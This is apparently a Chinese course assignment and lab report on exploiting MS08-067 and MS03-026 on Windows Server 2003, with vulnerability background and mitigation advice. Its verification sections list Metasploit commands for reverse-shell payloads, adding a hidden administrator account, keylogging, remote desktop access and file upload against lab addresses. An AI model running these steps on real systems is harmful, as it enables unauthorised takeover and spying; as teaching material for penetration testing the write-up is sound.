课程名称：《系统提权》

【要求】

1. 对Windows Server2003操作系统MS08_067、MS03_026漏洞进行提权渗透测试；
2. 对MS03_026漏洞开启远程桌面服务；
3. 操作过程可自由发挥；
4. 概念越详细越好；
5. 渗透和验证过程必要有截图和文字说明；
6. 其余部分均可配文字简介叙述；
7. 作业模板在此基础上可以自由发挥设计；
8. 熟悉虚拟机的使用，了解渗透测试工具的使用方法和Linux、DOS命令

• 测试对象

二、测试工具

三、被测设备信息情况

1.基本信息

2.端口开放情况

【漏洞名称】

MS08_067

【漏洞描述】

MS08-067漏洞将会影响除Windows Server 2008 Core以外的所有Windows系统，包括：Windows 2000/XP/Server 2003/Vista/Server 2008的各个版本，甚至还包括测试阶段的Windows 7 Pro-Beta。

发布日期：2008/10/22

下载大小：因操作系统而异

说明：微软安全公告KB958644

漏洞影响：服务器服务中的漏洞可能允许远程执行代码

发布日期：2008/10/22

下载大小：因操作系统而异。

受影响的操作系统： Windows 2000;XP;Server 2003;Vista;Server 2008;7 Beta

此安全更新解决了服务器服务中一个秘密报告的漏洞。 如果用户在受影响的系统上收到特制的 RPC 请求，则该漏洞可能允许远程执行代码。 在 Microsoft Windows 2000、Windows XP 和 Windows Server 2003 系统上，攻击者可能未经身份验证即可利用此漏洞运行任意代码。 此漏洞可能用于进行蠕虫攻击。 防火墙最佳做法和标准的默认防火墙配置有助于保护网络资源免受从企业外部发起的攻击。可以通过安装本 Microsoft 更新程序来保护计算机不受侵害。安装后，可能必须重新启动计算机。

严重等级：Windows 2000;XP;Server 2003为严重，Windows Vista;Server 2008;7 Beta为重要

【解决措施】

MS08-067漏洞的终端用户解决方案
　　这是一个针对139、445端口的RPC服务进行***的漏洞，可以直接获取系统控制权。根据微软的消息，该***无法穿透DEP机制的保护，对正版用户，该漏洞对XPSP2以上版本（含SP2）和Server2003SP1（含SP1）系统无效，因此主要受到威胁的用户应该是Windows2000和WindowsXPSP2以前版本用户。但由于一些盗版传播中，被人为降低了安全级别或者修改过安全机制，因此除了上述版本的用户也有可能受到***。
　　据安天介绍，一些常规的解决思路是，当有重大远程漏洞发生时，对于不需要实时连接的系统，可以考虑先断网检测安全配置，然后采用调整防火墙和安全策略的方式保证联网打补丁时段的安全，然后再进行补丁升级。
　　一、桌面与工作站用户的安全配置方案
　　桌面系统主要以浏览、下载、游戏、工作等与用户直接操作交互为主要应用方式，其多数网络操作为用户主动对外发起连接，而不是凭借本地监听端口为外部用户提供服务。桌面系统如果不提供共享打印，不需要在局域网游戏（如CS、FIFA等）中作为主机使用，可以通过设置为禁止发布发起连接模式，来阻断所有向本主机发起的连接。进行有关设置不会影响到操作者的浏览、聊天、下载、在线视频、常见网游等操作。
　　进行这样的设置不仅可以阻断MS08-067***，而且可以阻断所有相同针对主机固定端口的***，缺点是如果主机提供打印共享、网络共享目录等服务则会失效，在CS、FIFA等游戏中无法作为host主机使用，还可能与蓝波宽带拨号程序冲突。
　　1、Windows自带防火墙的相关配置
　　步骤1：在控制面板中找到防火墙。
　　
　　步骤2：选择更改设置，此时Vista系统的安全机制可能需要灰屏确认，请选择是。
　　
　　步骤3：启动防火墙并选择阻止所有传入连接。
　　
　　2、其它防火墙的安全设置
　　如果Windows系统的防火墙不支持本项设置，可通过其他防火墙实现，以安天盾防火墙免费工具为例。
　　步骤1：通过单击Windows开始菜单中安天安全中心项目，或者单击托盘中的安天安全中心图标，启动有关配置。
　　
　　步骤2：在安天安全中心界面上点击设置,进行漏洞补丁的调试。
　　
　　步骤3：将策略选择为系统初装。
　　
　　二、不需要开放RPC服务的服务器安全配置方案
　　网络服务器用户以固定端口对外进行服务，因此不能采用阻断所有传入连接的方式进行配置，否则会失效。而从WindowNTServer到Server2008，不需要开放RPC服务器的用户可以不依赖任何安全工具，仅凭借WindowsServer自身安全机制既可实现屏蔽，如果仅是直接关闭RPC服务，会给本机管理带来一些麻烦。
　　步骤1：点击右键，选择网络连接属性。
　　
　　步骤2：点击Internet协议（TCP/IP）属性。
　　
　　步骤3：在弹出的Internet协议（TCP/IP）属性对话框中点击“高级”。
　　
　　步骤4：对TCP/IP筛选中点击属性。
　　
　　步骤5：在TCP/IP筛选中配置允许访问的端口，只要不包含TCP139和445则MS08-067RPC***失效。
　　
　　三、需要开放RPC服务的服务器安全配置方案
　　需要开放RPC服务的服务器，如网络打印、网络共享和一些RPC通讯调用的节点，不能够通过上述关闭端口的方式，否则会造成无效。可以转而采用打补丁、打开DEP策略，或安装主机IPS的方法。下面介绍一下系统DEP保护配置的方法。
　　步骤1：我的电脑右键点击属性，点击“高级”页中的“设置”按钮。
　　
　　步骤2：设定数据执行保护策略，修改后重新启动电脑。
　　
　　在这里，进行不同的选择会有不同的效果，如果选择“仅为基本Windows程序和服务启用DEP”功能，则可以挡住本次RPC***，也可以挡住目前主流的针对Windows开放端口的***。在获得一定的安全性的情况下，保证系统的兼容性。但是缺点是不能保护类似IE浏览器、Outlook等比较脆弱的互联网应用程序，不能防范类似挂马注入的***。
　　如果选择“为除下列选定程序之外的所有程序和服务启用DEP”功能，则在上述效果的基础上，对Web挂马、各种应用软件插件注入都有很好的效果，具有更强的系统安全性，不过缺点是与部分应用程序冲突，但可以通过将冲突的程序设置为例外来解决。 
四、安装相应补丁，解决安全隐患 
根据自己系统情况寻找地址安装单一补丁，是一个有效修补漏洞并规避微软黑屏策略影响的方法。 
微软的补丁都可以离线安装，可以选择将有漏洞的系统断网，从安全的系统上下载补丁再用移动存储复制到有漏洞的系统下。

【漏洞验证】

1. 打开msfconsole

指令:mafconsole

1. 搜索ms08_067

指令:search ms08_067

3使用ma08_067_netapi

指令:use exploit/windows/smb/ms08_067_netapi

4.查看攻击载荷

指令:Show payloads

5. 设置windows/meterpreter/reverse_tcp载荷

  指令: set payload windows/meterpreter/reverse_tcp

6.查看需要配置的参数

指令: show options

7.设置参数

Lhost为攻击方ip,rhost为被攻击方ip,target为目标主机名称

指令: set lhost 10.10.10.130

set rhost 10.10.10.131

set target 3

8.发动攻击

指令:exploit

9.进入shell创建用户

指令:shell

net user hgc 123 /add

10.设置为超级用户

指令: net localgroup administrators hgc /add

11.对目标主机屏幕截取

1. 键盘记录

指令: keysscan_start

keyscan_dump

keyscan_stop

13.创建文件

指令:mkdir hgc

【漏洞名称】

MS03_026

【漏洞描述】

1、Remote Procedure Call (RPC)是Windows  操作系统使用的一种远程过程调用协议，RPC提供进程间交互通信机制，允许在某台计算机上运行程序的无缝地在远程系统上执行代码。协议本身源自开放软件基 金会的RPC协议，Microsoft在其基础上增加了自己的一些扩展。

eEye的研究人员发现，由于Windows RPC DCOM接口对报文的长度域缺乏检查导致发生基于堆的溢出，远程***者可以利用这些漏洞以本地系统权限在系统上执行任意指令。

漏洞实质上影响的是使用RPC的DCOM接口，此接口处理由客户端机器发送给服务器的DCOM对象激活请求(如UNC路径)。***者通过向目标发送畸形 RPC DCOM请求来利用这些漏洞。成功利用此漏洞可以以本地系统权限执行任意指令。***者可以在系统上执行任意操作  ，如安装程序、查看或更改、删除数据或创建系统管理员权限的帐户。

使用者可以通过  135(UDP/TCP)、137/UDP、138/UDP、139/TCP、445(UDP/TCP)、593/TCP端口进行攻击。对于启动了COM  Internet服务和RPC over HTTP的用户来说，还可能通过80/TCP和443/TCP端口进行***。

2、Microsoft DCOM  RPC相关系统漏洞,具体内容即为MS03-026和MS03-039.正因为此,造成Blaster.Worm(冲击波).以及 w32.Nachi.Worm(冲击波杀手)蠕虫病毒在校园网络中的泛滥.而且DCOM RPC漏洞的remote root  ,可以让一个不具备任何基础知识的攻击者,在2分钟之内进入到你的计算机系统中,他所做的仅仅是从网上下载一个简单的攻击工具和一个扫描工具就可以了.

查找ms03-026系统漏洞的利用：

msf>search ms03_026

显示找到的ms03-026的路径

msf>use exploit/windows/.../ms03_026_dcom

进入后可以输入

msf exploit(ms03_026_dcom) > show options

来查看所需要输入的参数

msf exploit(ms03_026_dcom) > show payloads

显示当前模块的所有攻击载荷。攻击载荷是我们希望在目标系统被渗透后去执行的代码。

msf exploit(ms03_026_dcom) > set PAYLOAD generic/shell_reverse_tcp

选择一个反弹式的shell

msf exploit(ms03_026_dcom) > set RHOST 192.168.250.157

msf exploit(ms03_026_dcom) > set LHOST 192.168.250.135

输入靶机地址和攻击机的地址

msf exploit(ms03_026_dcom) > exploit

开始进行渗透攻击

【解决措施】

解决方法:首先，打开“管理工具”→“服务”管理器，在服务管理器的主窗口服务列表中，找到名称为“Cryptographic Services”的服务项，双击该服务项，在弹出的该服务项属性对话框中，单击“停止”按钮，停止该服务。然后，在资源管理器中，打开系统安装目录\\System32\\文件夹，在该文件夹下，找到名为“catroot2”的文件夹，将其删除或重命名。最后在服务管理器中，将“Cryptographic Services”服务启动，并安装系统漏洞补丁，一般就可以正常安装系统补丁了

通过命令行的方法来解决:1、在开始中运行cmd，2、在窗口中运行net stop cryptsvc，回车，3、ren %systemroot%\system32\catroot2 oldcatroot2，回车，4、net start cryptsvc，回车，5、exit，回车。然后就可以了

其实其实现过程是一样的。把Cryptographic Services这个服务给修复好就可以了。
某些XP用户在安装MS03-026补丁出现提示“安装程序不能验证update.inf完整性，请确定加密服务正在此计算机上运行”，点击确定后就退出。

即使在命令行提示符下输入
net start cryptographic service

1、在开始中运行cmd
2、在窗口中运行net stop cryptsvc，
3、ren %systemroot%\system32\catroot2 oldcatroot2，
4、net start cryptsvc，

【漏洞验证】

1. 打开msfconsole

指令:msfconsole

1. 查找MS03_026

指令search MS03_026

3.执行该文件

指令: use exploit/windows/dcerpc/ms03_026_dcom

4.查看攻击载荷

指令:show payload

5.设置攻击载荷

  指令: set payload windows/meterpreter/reverse_tcp

6.查看需要设置的参数

  指令: show options

7.设置参数

Lhost为攻击方ip,rhost为被攻击方ip,target为目标主机名称

指令: set lhost 10.10.10.130

set rhost 10.10.10.131

set target  0

8.开始运行

1. 创建用户

 指令: net user hgc2 123 /add

1. 添加为系统管理员

  指令: net localgroup administrators hgc2 /add

11.远程桌面登录

成功连接远程主机

新建文件夹

返回虚拟机查看

可以看到文件夹成功出现,这表明系统管理员账户创建成功,远程主机连接成功

12.上传文件

  指令:upload /root/user.txt

返回windows 2003查看